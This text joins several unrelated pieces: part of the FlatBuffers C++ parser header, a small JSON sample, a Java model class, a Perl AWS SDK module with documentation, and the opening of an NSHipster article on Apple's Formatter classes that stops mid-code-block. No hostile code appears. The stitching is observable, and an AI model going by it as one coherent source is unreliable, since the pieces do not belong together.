Offset<reflection::EnumVal> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(const Parser &parser, const reflection::EnumVal *val);
uint64_t GetAsUInt64() const { return static_cast<uint64_t>(value); }
int64_t GetAsInt64() const { return value; }
bool IsZero() const { return 0 == value; }
bool IsNonZero() const { return !IsZero(); }
std::string name;
std::vector<std::string> doc_comment;
Type union_type;
private:
friend EnumDef;
friend EnumValBuilder;
friend bool operator==(const EnumVal &lhs, const EnumVal &rhs);
EnumVal(const std::string &_name, int64_t _val) : name(_name), value(_val) {}
EnumVal() : value(0) {}
int64_t value;
};
struct EnumDef : public Definition {
EnumDef() : is_union(false), uses_multiple_type_instances(false) {}
Offset<reflection::Enum> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Enum *values);
template<typename T> void ChangeEnumValue(EnumVal *ev, T new_val);
void SortByValue();
void RemoveDuplicates();
std::string AllFlags() const;
const EnumVal *MinValue() const;
const EnumVal *MaxValue() const;
// Returns the number of integer steps from v1 to v2.
uint64_t Distance(const EnumVal *v1, const EnumVal *v2) const;
// Returns the number of integer steps from Min to Max.
uint64_t Distance() const { return Distance(MinValue(), MaxValue()); }
EnumVal *ReverseLookup(int64_t enum_idx,
bool skip_union_default = false) const;
EnumVal *FindByValue(const std::string &constant) const;
std::string ToString(const EnumVal &ev) const {
return IsUInt64() ? NumToString(ev.GetAsUInt64())
: NumToString(ev.GetAsInt64());
}
size_t size() const { return vals.vec.size(); }
const std::vector<EnumVal *> &Vals() const {
return vals.vec;
}
const EnumVal *Lookup(const std::string &enum_name) const {
return vals.Lookup(enum_name);
}
bool is_union;
// Type is a union which uses type aliases where at least one type is
// available under two different names.
bool uses_multiple_type_instances;
Type underlying_type;
private:
bool IsUInt64() const {
return (BASE_TYPE_ULONG == underlying_type.base_type);
}
friend EnumValBuilder;
SymbolTable<EnumVal> vals;
};
inline bool IsStruct(const Type &type) {
return type.base_type == BASE_TYPE_STRUCT && type.struct_def->fixed;
}
inline bool IsUnion(const Type &type) {
return type.enum_def != nullptr && type.enum_def->is_union;
}
inline bool IsVector(const Type &type) {
return type.base_type == BASE_TYPE_VECTOR;
}
inline bool IsArray(const Type &type) {
return type.base_type == BASE_TYPE_ARRAY;
}
inline bool IsSeries(const Type &type) {
return IsVector(type) || IsArray(type);
}
inline bool IsEnum(const Type &type) {
return type.enum_def != nullptr && IsInteger(type.base_type);
}
inline size_t InlineSize(const Type &type) {
return IsStruct(type)
? type.struct_def->bytesize
: (IsArray(type)
? InlineSize(type.VectorType()) * type.fixed_length
: SizeOf(type.base_type));
}
inline size_t InlineAlignment(const Type &type) {
if (IsStruct(type)) {
return type.struct_def->minalign;
} else if (IsArray(type)) {
return IsStruct(type.VectorType()) ? type.struct_def->minalign
: SizeOf(type.element);
} else {
return SizeOf(type.base_type);
}
}
inline bool operator==(const EnumVal &lhs, const EnumVal &rhs) {
return lhs.value == rhs.value;
}
inline bool operator!=(const EnumVal &lhs, const EnumVal &rhs) {
return !(lhs == rhs);
}
inline bool EqualByName(const Type &a, const Type &b) {
return a.base_type == b.base_type && a.element == b.element &&
(a.struct_def == b.struct_def ||
a.struct_def->name == b.struct_def->name) &&
(a.enum_def == b.enum_def || a.enum_def->name == b.enum_def->name);
}
struct RPCCall : public Definition {
Offset<reflection::RPCCall> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::RPCCall *call);
StructDef *request, *response;
};
struct ServiceDef : public Definition {
Offset<reflection::Service> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Service *service);
SymbolTable<RPCCall> calls;
};
// Container of options that may apply to any of the source/text generators.
struct IDLOptions {
// Use flexbuffers instead for binary and text generation
bool use_flexbuffers;
bool strict_json;
bool skip_js_exports;
bool use_goog_js_export_format;
bool use_ES6_js_export_format;
bool output_default_scalars_in_json;
int indent_step;
bool output_enum_identifiers;
bool prefixed_enums;
bool scoped_enums;
bool include_dependence_headers;
bool mutable_buffer;
bool one_file;
bool proto_mode;
bool proto_oneof_union;
bool generate_all;
bool skip_unexpected_fields_in_json;
bool generate_name_strings;
bool generate_object_based_api;
bool gen_compare;
std::string cpp_object_api_pointer_type;
std::string cpp_object_api_string_type;
bool cpp_object_api_string_flexible_constructor;
bool gen_nullable;
bool java_checkerframework;
bool gen_generated;
std::string object_prefix;
std::string object_suffix;
bool union_value_namespacing;
bool allow_non_utf8;
bool natural_utf8;
std::string include_prefix;
bool keep_include_path;
bool binary_schema_comments;
bool binary_schema_builtins;
bool binary_schema_gen_embed;
bool skip_flatbuffers_import;
std::string go_import;
std::string go_namespace;
bool reexport_ts_modules;
bool js_ts_short_names;
bool protobuf_ascii_alike;
bool size_prefixed;
std::string root_type;
bool force_defaults;
bool java_primitive_has_method;
bool cs_gen_json_serializer;
std::vector<std::string> cpp_includes;
std::string cpp_std;
std::string proto_namespace_suffix;
std::string filename_suffix;
std::string filename_extension;
// Possible options for the more general generator below.
enum Language {
kJava = 1 << 0,
kCSharp = 1 << 1,
kGo = 1 << 2,
kCpp = 1 << 3,
kJs = 1 << 4,
kPython = 1 << 5,
kPhp = 1 << 6,
kJson = 1 << 7,
kBinary = 1 << 8,
kTs = 1 << 9,
kJsonSchema = 1 << 10,
kDart = 1 << 11,
kLua = 1 << 12,
kLobster = 1 << 13,
kRust = 1 << 14,
kKotlin = 1 << 15,
kSwift = 1 << 16,
kMAX
};
Language lang;
enum MiniReflect { kNone, kTypes, kTypesAndNames };
MiniReflect mini_reflect;
// The corresponding language bit will be set if a language is included
// for code generation.
unsigned long lang_to_generate;
// If set (default behavior), empty string fields will be set to nullptr to
// make the flatbuffer more compact.
bool set_empty_strings_to_null;
// If set (default behavior), empty vector fields will be set to nullptr to
// make the flatbuffer more compact.
bool set_empty_vectors_to_null;
IDLOptions()
: use_flexbuffers(false),
strict_json(false),
skip_js_exports(false),
use_goog_js_export_format(false),
use_ES6_js_export_format(false),
output_default_scalars_in_json(false),
indent_step(2),
output_enum_identifiers(true),
prefixed_enums(true),
scoped_enums(false),
include_dependence_headers(true),
mutable_buffer(false),
one_file(false),
proto_mode(false),
proto_oneof_union(false),
generate_all(false),
skip_unexpected_fields_in_json(false),
generate_name_strings(false),
generate_object_based_api(false),
gen_compare(false),
cpp_object_api_pointer_type("std::unique_ptr"),
cpp_object_api_string_flexible_constructor(false),
gen_nullable(false),
java_checkerframework(false),
gen_generated(false),
object_suffix("T"),
union_value_namespacing(true),
allow_non_utf8(false),
natural_utf8(false),
keep_include_path(false),
binary_schema_comments(false),
binary_schema_builtins(false),
binary_schema_gen_embed(false),
skip_flatbuffers_import(false),
reexport_ts_modules(true),
js_ts_short_names(false),
protobuf_ascii_alike(false),
size_prefixed(false),
force_defaults(false),
java_primitive_has_method(false),
cs_gen_json_serializer(false),
filename_suffix("_generated"),
filename_extension(),
lang(IDLOptions::kJava),
mini_reflect(IDLOptions::kNone),
lang_to_generate(0),
set_empty_strings_to_null(true),
set_empty_vectors_to_null(true) {}
};
// This encapsulates where the parser is in the current source file.
struct ParserState {
ParserState()
: cursor_(nullptr),
line_start_(nullptr),
line_(0),
token_(-1),
attr_is_trivial_ascii_string_(true) {}
protected:
void ResetState(const char *source) {
cursor_ = source;
line_ = 0;
MarkNewLine();
}
void MarkNewLine() {
line_start_ = cursor_;
line_ += 1;
}
int64_t CursorPosition() const {
FLATBUFFERS_ASSERT(cursor_ && line_start_ && cursor_ >= line_start_);
return static_cast<int64_t>(cursor_ - line_start_);
}
const char *cursor_;
const char *line_start_;
int line_; // the current line being parsed
int token_;
// Flag: text in attribute_ is a trivial ASCII string without escape
// sequences. Only printable ASCII (without [\t\r\n]).
// Used for number-in-string (and base64 string in future).
bool attr_is_trivial_ascii_string_;
std::string attribute_;
std::vector<std::string> doc_comment_;
};
// A way to make error propagation less error prone by requiring values to be
// checked.
// Once you create a value of this type you must either:
// - Call Check() on it.
// - Copy or assign it to another value.
// Failure to do so leads to an assert.
// This guarantees that, as a return value, it cannot be ignored.
class CheckedError {
public:
explicit CheckedError(bool error)
: is_error_(error), has_been_checked_(false) {}
CheckedError &operator=(const CheckedError &other) {
is_error_ = other.is_error_;
has_been_checked_ = false;
other.has_been_checked_ = true;
return *this;
}
CheckedError(const CheckedError &other) {
*this = other; // Use assignment operator.
}
~CheckedError() { FLATBUFFERS_ASSERT(has_been_checked_); }
bool Check() {
has_been_checked_ = true;
return is_error_;
}
private:
bool is_error_;
mutable bool has_been_checked_;
};
// Additionally, in GCC we can get these errors statically, for additional
// assurance:
// clang-format off
#ifdef __GNUC__
#define FLATBUFFERS_CHECKED_ERROR CheckedError \
__attribute__((warn_unused_result))
#else
#define FLATBUFFERS_CHECKED_ERROR CheckedError
#endif
// clang-format on
class Parser : public ParserState {
public:
explicit Parser(const IDLOptions &options = IDLOptions())
: current_namespace_(nullptr),
empty_namespace_(nullptr),
flex_builder_(256, flexbuffers::BUILDER_FLAG_SHARE_ALL),
root_struct_def_(nullptr),
opts(options),
uses_flexbuffers_(false),
source_(nullptr),
anonymous_counter(0),
recurse_protection_counter(0) {
if (opts.force_defaults) { builder_.ForceDefaults(true); }
// Start out with the empty namespace being current.
empty_namespace_ = new Namespace();
namespaces_.push_back(empty_namespace_);
current_namespace_ = empty_namespace_;
known_attributes_["deprecated"] = true;
known_attributes_["required"] = true;
known_attributes_["key"] = true;
known_attributes_["shared"] = true;
known_attributes_["hash"] = true;
known_attributes_["id"] = true;
known_attributes_["force_align"] = true;
known_attributes_["bit_flags"] = true;
known_attributes_["original_order"] = true;
known_attributes_["nested_flatbuffer"] = true;
known_attributes_["csharp_partial"] = true;
known_attributes_["streaming"] = true;
known_attributes_["idempotent"] = true;
known_attributes_["cpp_type"] = true;
known_attributes_["cpp_ptr_type"] = true;
known_attributes_["cpp_ptr_type_get"] = true;
known_attributes_["cpp_str_type"] = true;
known_attributes_["cpp_str_flex_ctor"] = true;
known_attributes_["native_inline"] = true;
known_attributes_["native_custom_alloc"] = true;
known_attributes_["native_type"] = true;
known_attributes_["native_default"] = true;
known_attributes_["flexbuffer"] = true;
known_attributes_["private"] = true;
}
~Parser() {
for (auto it = namespaces_.begin(); it != namespaces_.end(); ++it) {
delete *it;
}
}
// Parse the string containing either schema or JSON data, which will
// populate the SymbolTable's or the FlatBufferBuilder above.
// include_paths is used to resolve any include statements, and typically
// should at least include the project path (where you loaded source_ from).
// include_paths must be nullptr terminated if specified.
// If include_paths is nullptr, it will attempt to load from the current
// directory.
// If the source was loaded from a file and isn't an include file,
// supply its name in source_filename.
// All paths specified in this call must be in posix format, if you accept
// paths from user input, please call PosixPath on them first.
bool Parse(const char *_source, const char **include_paths = nullptr,
const char *source_filename = nullptr);
// Set the root type. May override the one set in the schema.
bool SetRootType(const char *name);
// Mark all definitions as already having code generated.
void MarkGenerated();
// Get the files recursively included by the given file. The returned
// container will have at least the given file.
std::set<std::string> GetIncludedFilesRecursive(
const std::string &file_name) const;
// Fills builder_ with a binary version of the schema parsed.
// See reflection/reflection.fbs
void Serialize();
// Deserialize a schema buffer
bool Deserialize(const uint8_t *buf, const size_t size);
// Fills internal structure as if the schema passed had been loaded by parsing
// with Parse except that included filenames will not be populated.
bool Deserialize(const reflection::Schema *schema);
Type *DeserializeType(const reflection::Type *type);
// Checks that the schema represented by this parser is a safe evolution
// of the schema provided. Returns non-empty error on any problems.
std::string ConformTo(const Parser &base);
// Similar to Parse(), but now only accepts JSON to be parsed into a
// FlexBuffer.
bool ParseFlexBuffer(const char *source, const char *source_filename,
flexbuffers::Builder *builder);
StructDef *LookupStruct(const std::string &id) const;
std::string UnqualifiedName(const std::string &fullQualifiedName);
FLATBUFFERS_CHECKED_ERROR Error(const std::string &msg);
private:
void Message(const std::string &msg);
void Warning(const std::string &msg);
FLATBUFFERS_CHECKED_ERROR ParseHexNum(int nibbles, uint64_t *val);
FLATBUFFERS_CHECKED_ERROR Next();
FLATBUFFERS_CHECKED_ERROR SkipByteOrderMark();
bool Is(int t) const;
bool IsIdent(const char *id) const;
FLATBUFFERS_CHECKED_ERROR Expect(int t);
std::string TokenToStringId(int t) const;
EnumDef *LookupEnum(const std::string &id);
FLATBUFFERS_CHECKED_ERROR ParseNamespacing(std::string *id,
std::string *last);
FLATBUFFERS_CHECKED_ERROR ParseTypeIdent(Type &type);
FLATBUFFERS_CHECKED_ERROR ParseType(Type &type);
FLATBUFFERS_CHECKED_ERROR AddField(StructDef &struct_def,
const std::string &name, const Type &type,
FieldDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseField(StructDef &struct_def);
FLATBUFFERS_CHECKED_ERROR ParseString(Value &val);
FLATBUFFERS_CHECKED_ERROR ParseComma();
FLATBUFFERS_CHECKED_ERROR ParseAnyValue(Value &val, FieldDef *field,
size_t parent_fieldn,
const StructDef *parent_struct_def,
uoffset_t count,
bool inside_vector = false);
template<typename F>
FLATBUFFERS_CHECKED_ERROR ParseTableDelimiters(size_t &fieldn,
const StructDef *struct_def,
F body);
FLATBUFFERS_CHECKED_ERROR ParseTable(const StructDef &struct_def,
std::string *value, uoffset_t *ovalue);
void SerializeStruct(const StructDef &struct_def, const Value &val);
void SerializeStruct(FlatBufferBuilder &builder, const StructDef &struct_def,
const Value &val);
template<typename F>
FLATBUFFERS_CHECKED_ERROR ParseVectorDelimiters(uoffset_t &count, F body);
FLATBUFFERS_CHECKED_ERROR ParseVector(const Type &type, uoffset_t *ovalue,
FieldDef *field, size_t fieldn);
FLATBUFFERS_CHECKED_ERROR ParseArray(Value &array);
FLATBUFFERS_CHECKED_ERROR ParseNestedFlatbuffer(
Value &val, FieldDef *field, size_t fieldn,
const StructDef *parent_struct_def);
FLATBUFFERS_CHECKED_ERROR ParseMetaData(SymbolTable<Value> *attributes);
FLATBUFFERS_CHECKED_ERROR TryTypedValue(const std::string *name, int dtoken,
bool check, Value &e, BaseType req,
bool *destmatch);
FLATBUFFERS_CHECKED_ERROR ParseHash(Value &e, FieldDef *field);
FLATBUFFERS_CHECKED_ERROR TokenError();
FLATBUFFERS_CHECKED_ERROR ParseSingleValue(const std::string *name, Value &e,
bool check_now);
FLATBUFFERS_CHECKED_ERROR ParseEnumFromString(const Type &type,
std::string *result);
StructDef *LookupCreateStruct(const std::string &name,
bool create_if_new = true,
bool definition = false);
FLATBUFFERS_CHECKED_ERROR ParseEnum(bool is_union, EnumDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseNamespace();
FLATBUFFERS_CHECKED_ERROR StartStruct(const std::string &name,
StructDef **dest);
FLATBUFFERS_CHECKED_ERROR StartEnum(const std::string &name, bool is_union,
EnumDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseDecl();
FLATBUFFERS_CHECKED_ERROR ParseService();
FLATBUFFERS_CHECKED_ERROR ParseProtoFields(StructDef *struct_def,
bool isextend, bool inside_oneof);
FLATBUFFERS_CHECKED_ERROR ParseProtoOption();
FLATBUFFERS_CHECKED_ERROR ParseProtoKey();
FLATBUFFERS_CHECKED_ERROR ParseProtoDecl();
FLATBUFFERS_CHECKED_ERROR ParseProtoCurliesOrIdent();
FLATBUFFERS_CHECKED_ERROR ParseTypeFromProtoType(Type *type);
FLATBUFFERS_CHECKED_ERROR SkipAnyJsonValue();
FLATBUFFERS_CHECKED_ERROR ParseFlexBufferValue(flexbuffers::Builder *builder);
FLATBUFFERS_CHECKED_ERROR StartParseFile(const char *source,
const char *source_filename);
FLATBUFFERS_CHECKED_ERROR ParseRoot(const char *_source,
const char **include_paths,
const char *source_filename);
FLATBUFFERS_CHECKED_ERROR DoParse(const char *_source,
const char **include_paths,
const char *source_filename,
const char *include_filename);
FLATBUFFERS_CHECKED_ERROR CheckClash(std::vector<FieldDef *> &fields,
StructDef *struct_def,
const char *suffix, BaseType baseType);
bool SupportsAdvancedUnionFeatures() const;
bool SupportsAdvancedArrayFeatures() const;
Namespace *UniqueNamespace(Namespace *ns);
FLATBUFFERS_CHECKED_ERROR RecurseError();
template<typename F> CheckedError Recurse(F f);
public:
SymbolTable<Type> types_;
SymbolTable<StructDef> structs_;
SymbolTable<EnumDef> enums_;
SymbolTable<ServiceDef> services_;
std::vector<Namespace *> namespaces_;
Namespace *current_namespace_;
Namespace *empty_namespace_;
std::string error_; // User readable error_ if Parse() == false
FlatBufferBuilder builder_; // any data contained in the file
flexbuffers::Builder flex_builder_;
flexbuffers::Reference flex_root_;
StructDef *root_struct_def_;
std::string file_identifier_;
std::string file_extension_;
std::map<std::string, std::string> included_files_;
std::map<std::string, std::set<std::string>> files_included_per_file_;
std::vector<std::string> native_included_files_;
std::map<std::string, bool> known_attributes_;
IDLOptions opts;
bool uses_flexbuffers_;
private:
const char *source_;
std::string file_being_parsed_;
std::vector<std::pair<Value, FieldDef *>> field_stack_;
int anonymous_counter;
int recurse_protection_counter;
};
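// Typical usage of the Parser (a minimal sketch, not part of this header; the
// schema text is an arbitrary example):
//
//   flatbuffers::Parser parser;
//   const char *schema =
//       "table Monster { name:string; hp:int; } root_type Monster;";
//   if (!parser.Parse(schema)) {
//     printf("%s\n", parser.error_.c_str());  // human-readable error message
//   }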
// Utility functions for multiple generators:
extern std::string MakeCamel(const std::string &in, bool first = true);
extern std::string MakeScreamingCamel(const std::string &in);
// Generate text (JSON) from a given FlatBuffer, and a given Parser
// object that has been populated with the corresponding schema.
// If indent_step is 0, no indentation will be generated. Additionally,
// if it is less than 0, no linefeeds will be generated either.
// See idl_gen_text.cpp.
// strict_json adds "quotes" around field names if true.
// If the flatbuffer cannot be encoded in JSON (e.g., it contains non-UTF-8
// byte arrays in String values), returns false.
extern bool GenerateTextFromTable(const Parser &parser, const void *table,
const std::string &tablename,
std::string *text);
extern bool GenerateText(const Parser &parser, const void *flatbuffer,
std::string *text);
extern bool GenerateTextFile(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate binary files from a given FlatBuffer, and a given Parser
// object that has been populated with the corresponding schema.
// See code_generators.cpp.
extern bool GenerateBinary(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a C++ header from the definitions in the Parser object.
// See idl_gen_cpp.
extern bool GenerateCPP(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate C# files from the definitions in the Parser object.
// See idl_gen_csharp.cpp.
extern bool GenerateCSharp(const Parser &parser, const std::string &path,
const std::string &file_name);
extern bool GenerateDart(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Java files from the definitions in the Parser object.
// See idl_gen_java.cpp.
extern bool GenerateJava(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate JavaScript or TypeScript code from the definitions in the Parser
// object. See idl_gen_js.
extern bool GenerateJSTS(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Go files from the definitions in the Parser object.
// See idl_gen_go.cpp.
extern bool GenerateGo(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Php code from the definitions in the Parser object.
// See idl_gen_php.
extern bool GeneratePhp(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Python files from the definitions in the Parser object.
// See idl_gen_python.cpp.
extern bool GeneratePython(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Lobster files from the definitions in the Parser object.
// See idl_gen_lobster.cpp.
extern bool GenerateLobster(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Lua files from the definitions in the Parser object.
// See idl_gen_lua.cpp.
extern bool GenerateLua(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Rust files from the definitions in the Parser object.
// See idl_gen_rust.cpp.
extern bool GenerateRust(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Json schema file
// See idl_gen_json_schema.cpp.
extern bool GenerateJsonSchema(const Parser &parser, const std::string &path,
const std::string &file_name);
extern bool GenerateKotlin(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Swift classes.
// See idl_gen_swift.cpp
extern bool GenerateSwift(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a schema file from the internal representation, useful after
// parsing a .proto schema.
extern std::string GenerateFBS(const Parser &parser,
const std::string &file_name);
extern bool GenerateFBS(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated JavaScript or TypeScript code.
// See idl_gen_js.cpp.
extern std::string JSTSMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated C++ header.
// See idl_gen_cpp.cpp.
extern std::string CPPMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated Dart code
// see idl_gen_dart.cpp
extern std::string DartMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated Rust code.
// See idl_gen_rust.cpp.
extern std::string RustMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for generated Java or C# files.
// See code_generators.cpp.
extern std::string JavaCSharpMakeRule(const Parser &parser,
const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated text (JSON) files.
// See idl_gen_text.cpp.
extern std::string TextMakeRule(const Parser &parser, const std::string &path,
const std::string &file_names);
// Generate a make rule for the generated binary files.
// See code_generators.cpp.
extern std::string BinaryMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Cpp interfaces.
// See idl_gen_grpc.cpp.
bool GenerateCppGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Go interfaces.
// See idl_gen_grpc.cpp.
bool GenerateGoGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Java classes.
// See idl_gen_grpc.cpp
bool GenerateJavaGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Python interfaces.
// See idl_gen_grpc.cpp.
bool GeneratePythonGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Swift interfaces.
// See idl_gen_grpc.cpp.
extern bool GenerateSwiftGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
} // namespace flatbuffers
#endif // FLATBUFFERS_IDL_H_
{
"data": {
"hello": "World",
"world": "Hello"
}
}
package com.tencent.ttpic.model;
public class GridModel {
public int aspectMode;
public Rect canvasRect;
public int positionMode;
public int renderId;
public int transformType;
public int zIndex;
}
package Paws::DataPipeline::ListPipelines;
use Moose;
has Marker => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'marker' );
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'ListPipelines');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::DataPipeline::ListPipelinesOutput');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::DataPipeline::ListPipelines - Arguments for method ListPipelines on L<Paws::DataPipeline>
=head1 DESCRIPTION
This class represents the parameters used for calling the method ListPipelines on the
L<AWS Data Pipeline|Paws::DataPipeline> service. Use the attributes of this class
as arguments to method ListPipelines.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to ListPipelines.
=head1 SYNOPSIS
my $datapipeline = Paws->service('DataPipeline');
my $ListPipelinesOutput = $datapipeline->ListPipelines(
Marker => 'Mystring', # OPTIONAL
);
# Results:
my $HasMoreResults = $ListPipelinesOutput->HasMoreResults;
my $Marker = $ListPipelinesOutput->Marker;
my $PipelineIdList = $ListPipelinesOutput->PipelineIdList;
# Returns a L<Paws::DataPipeline::ListPipelinesOutput> object.
Values for attributes that are native types (Int, String, Float, etc) can be passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/datapipeline/ListPipelines>
=head1 ATTRIBUTES
=head2 Marker => Str
The starting point for the results to be returned. For the first call,
this value should be empty. As long as there are more results, continue
to call C<ListPipelines> with the marker value from the previous call
to retrieve the next set of results.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method ListPipelines in L<Paws::DataPipeline>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| {
"pile_set_name": "Github"
} |
---
title: Formatter
author: Mattt
category: Cocoa
tags: nshipster, popular
excerpt: >-
Conversion is a tireless errand in software development.
Most programs boil down to some variation of
transforming data into something more useful.
revisions:
"2014-06-30": Converted examples to Swift; added iOS 8 & OS X Yosemite formatter classes.
"2015-02-17": Converted remaining examples to Swift; reintroduced Objective-C examples; added Objective-C examples for new formatter classes.
"2019-07-15": Updated for iOS 13 & macOS 10.15
status:
swift: 5.1
reviewed: July 15, 2019
---
Conversion is a tireless errand in software development.
Most programs boil down to some variation of
transforming data into something more useful.
In the case of user-facing software,
making data human-readable is an essential task ---
and a complex one at that.
A user's preferred language, calendar, and currency
can all factor into how information should be displayed,
as can other constraints, such as a label's dimensions.
All of this is to say:
calling `description` on an object just doesn't cut it
under most circumstances.
Indeed,
the real tool for this job is <dfn>`Formatter`</dfn>:
an ancient, abstract class deep in the heart of the Foundation framework
that's responsible for transforming data into textual representations.
---
`Formatter`'s origins trace back to `NSCell`,
which is used to display information and accept user input in
tables, form fields, and other views in AppKit.
Much of the API design of `(NS)Formatter` reflects this.
Back then,
formatters came in two flavors: dates and numbers.
But these days,
there are formatters for everything from
physical quantities and time intervals to personal names and postal addresses.
And as if that weren't enough to keep straight,
a good portion of these have been
<dfn>soft-deprecated</dfn>,
or otherwise superseded by more capable APIs (that are also formatters).
{% error %}
There are so many formatters in Apple SDKs
that it's impossible to keep them all in working memory.
Apparently, this is as true of computers as it is for humans;
at the time of writing,
[searching for "formatter" on developer.apple.com](https://developer.apple.com/search/?q=formatter&type=Reference)
fails with a timeout!
{% enderror %}
To make sense of everything,
this week's article groups each of the built-in formatters
into one of four categories:
[Numbers and Quantities](#formatting-numbers-and-quantities)
: [`NumberFormatter`](#numberformatter)
: [`MeasurementFormatter`](#measurementformatter)
[Dates, Times, and Durations](#formatting-dates-times-and-durations)
: [`DateFormatter`](#dateformatter)
: [`ISO8601DateFormatter`](#iso8601dateformatter)
: [`DateComponentsFormatter`](#datecomponentsformatter)
: [`DateIntervalFormatter`](#dateintervalformatter)
: [`RelativeDateTimeFormatter`](#relativedatetimeformatter)
[People and Places](#formatting-people-and-places)
: [`PersonNameComponentsFormatter`](#personnamecomponentsformatter)
: [`CNPostalAddressFormatter`](#cnpostaladdressformatter)
[Lists and Items](#formatting-lists-and-items)
: [`ListFormatter`](#listformatter)
---
## Formatting Numbers and Quantities
| Class | Example Output | Availability |
| ---------------------- | --------------- | ---------------------------- |
| `NumberFormatter` | "1,234.56" | iOS 2.0 <br/> macOS 10.0+ |
| `MeasurementFormatter` | "-9.80665 m/s²" | iOS 10.0+ <br/> macOS 10.12+ |
| `ByteCountFormatter` | "756 KB" | iOS 6.0+ <br/> macOS 10.8+ |
| `EnergyFormatter` | "80 kcal" | iOS 8.0+ <br/> macOS 10.10+ |
| `MassFormatter` | "175 lb" | iOS 8.0+ <br/> macOS 10.10+ |
| `LengthFormatter` | "5 ft, 11 in" | iOS 8.0+ <br/> macOS 10.10+ |
| `MKDistanceFormatter` | "500 miles" | iOS 7.0+ <br/> macOS 10.9+ |
{% warning %}
`ByteCountFormatter`,
`EnergyFormatter`,
`MassFormatter`,
`LengthFormatter`, and
`MKDistanceFormatter`
are superseded by `MeasurementFormatter`.
| Legacy Formatter | Measurement Formatter Unit |
| --------------------- | -------------------------- |
| `ByteCountFormatter` | `UnitInformationStorage` |
| `EnergyFormatter` | `UnitEnergy` |
| `MassFormatter` | `UnitMass` |
| `LengthFormatter` | `UnitLength` |
| `MKDistanceFormatter` | `UnitLength` |
The only occasions in which you might still use
`EnergyFormatter`, `MassFormatter`, or `LengthFormatter`
are when working with the HealthKit framework;
these formatters provide conversion and interoperability
with `HKUnit` quantities.
{% endwarning %}
### NumberFormatter
`NumberFormatter` covers every aspect of number formatting imaginable.
For better or for worse
_(mostly for better)_,
this all-in-one API handles
ordinals and cardinals,
mathematical and scientific notation,
percentages,
and monetary amounts in various flavors.
It can even write out numbers in a few different languages!
So whenever you reach for `NumberFormatter`,
the first order of business is to establish
what _kind_ of number you're working with
and set the `numberStyle` property accordingly.
#### Number Styles
| Number Style | Example Output |
| -------------------- | ------------------------ |
| `none` | 123 |
| `decimal` | 123.456 |
| `percent` | 12% |
| `scientific` | 1.23456789E4 |
| `spellOut` | one hundred twenty-three |
| `ordinal` | 3rd |
| `currency` | \$1234.57 |
| `currencyAccounting` | (\$1234.57) |
| `currencyISOCode` | USD1,234.57 |
| `currencyPlural` | 1,234.57 US dollars |
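To get a feel for how these presets differ in practice,
here's a quick sketch that cycles a single formatter through a few of the styles
(outputs in the comments assume an `en_US` locale):
```swift
let formatter = NumberFormatter()
formatter.locale = Locale(identifier: "en_US")
formatter.numberStyle = .decimal
formatter.string(from: 123.456) // "123.456"
formatter.numberStyle = .percent
formatter.string(from: 0.12) // "12%"
formatter.numberStyle = .spellOut
formatter.string(from: 123) // "one hundred twenty-three"
```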
{% warning %}
`NumberFormatter` also has a `format` property
that takes a familiar `SPRINTF(3)`-style format string.
[As we've argued in a previous article](/expressiblebystringinterpolation/),
format strings are something to be avoided unless absolutely necessary.
{% endwarning %}
#### Rounding & Significant Digits
To prevent numbers from getting annoyingly pedantic
_("thirty-two point three three --- repeating, of course…")_,
you'll want to get a handle on `NumberFormatter`'s rounding behavior.
Here, you have two options:
- Set `usesSignificantDigits` to `true`
to format according to the rules of
[<dfn>significant figures</dfn>](https://en.wikipedia.org/wiki/Significant_figures)
```swift
var formatter = NumberFormatter()
formatter.usesSignificantDigits = true
formatter.minimumSignificantDigits = 1 // default
formatter.maximumSignificantDigits = 6 // default
